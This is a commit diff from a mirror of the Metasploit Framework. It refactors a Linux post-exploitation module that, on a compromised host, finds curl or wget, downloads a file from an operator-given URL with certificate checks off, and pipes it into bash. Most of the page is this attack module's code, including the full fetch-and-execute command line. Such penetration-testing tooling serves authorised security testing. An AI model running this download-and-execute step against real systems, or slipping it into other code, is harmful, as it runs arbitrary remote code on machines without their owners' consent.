infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2 from jvazquez-r7/download_exec_mod 

cleanup for download_exec
unstable
dougsko 2013-03-21 06:00:18 -07:00
parent 39b1ad8bd6 370f849e29
commit b7ee9e5699
1 changed files with 52 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

90
modules/post/linux/manage/download_exec.rb
View File

@ -18,23 +18,37 @@ class Metasploit3 < Msf::Post
include Msf::Post::File include Msf::Post::File
include Msf::Post::Linux::System include Msf::Post::Linux::System
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'Linux Download Exec', 'Name' => 'Linux Manage Download and Exececute',
'Description' => %q{ 'Description' => %q{
This module downloads and runs a file with bash. It first This module downloads and runs a file with bash. It first tries to uses curl as
tries to uses curl as its HTTP client and then wget if it's not found. Bash its HTTP client and then wget if it's not found. Bash found in the PATH is used to
found in the PATH is used to execute the file.}, execute the file.
},
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Joshua D. Abraham 'Author' =>
<jabra[at]praetorian.com>', ], 'Platform' => [ 'linux' ], [
'SessionTypes' => [ 'shell' ])) 'Joshua D. Abraham <jabra[at]praetorian.com>',
register_options( ],
[ 'Platform' => [ 'linux' ],
OptString.new('URL', [true, 'Full URL of file to download.']) 'SessionTypes' => [ 'shell' ]
], self.class) ))
register_options(
[
OptString.new('URL', [true, 'Full URL of file to download.'])
], self.class)
end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end end
def exists_exe?(exe) def exists_exe?(exe)
@ -50,40 +64,40 @@ found in the PATH is used to execute the file.},
return false return false
end end
def run def search_http_client
stdout_option = ""
print_status("Checking if curl exists in the path...") print_status("Checking if curl exists in the path...")
if exists_exe?("curl") if exists_exe?("curl")
print_good("curl available, going ahead...") print_good("curl available, using it")
http_client = "curl" @stdout_option = ""
ssl_option = "-k" @http_client = "curl"
else @ssl_option = "-k"
print_warning("curl not available on the $PATH, checking for wget...") return
print_status("Checking if wget exists in the path...") end
if exists_exe?("wget")
print_good("wget available, going ahead...") print_status("Checking if wget exists in the path...")
http_client = "wget" if exists_exe?("wget")
stdout_option = "-O-" print_good("wget available, using it")
ssl_option = "--no-check-certificate" @http_client = "wget"
else @stdout_option = "-O-"
print_warning("neither curl nor wget available in the $PATH, aborting...") @ssl_option = "--no-check-certificate"
return
end
end
def run
search_http_client
if not @http_client
print_warning("neither curl nor wget available in the $PATH, aborting...")
return return
end
end end
if datastore['URL'].match(/https/) if datastore['URL'].match(/https/)
cmd_exec_vprint("`which #{http_client}` #{stdout_option} #{ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ") cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
else else
cmd_exec_vprint("`which #{http_client}` #{stdout_option} #{datastore['URL']} 2>/dev/null | `which bash` ") cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
end end
end end
def cmd_exec_vprint(cmd)
vprint_status("Executing: #{cmd}")
output = cmd_exec(cmd)
if output.length > 0
vprint_status("#{output}")
end
return
end
end end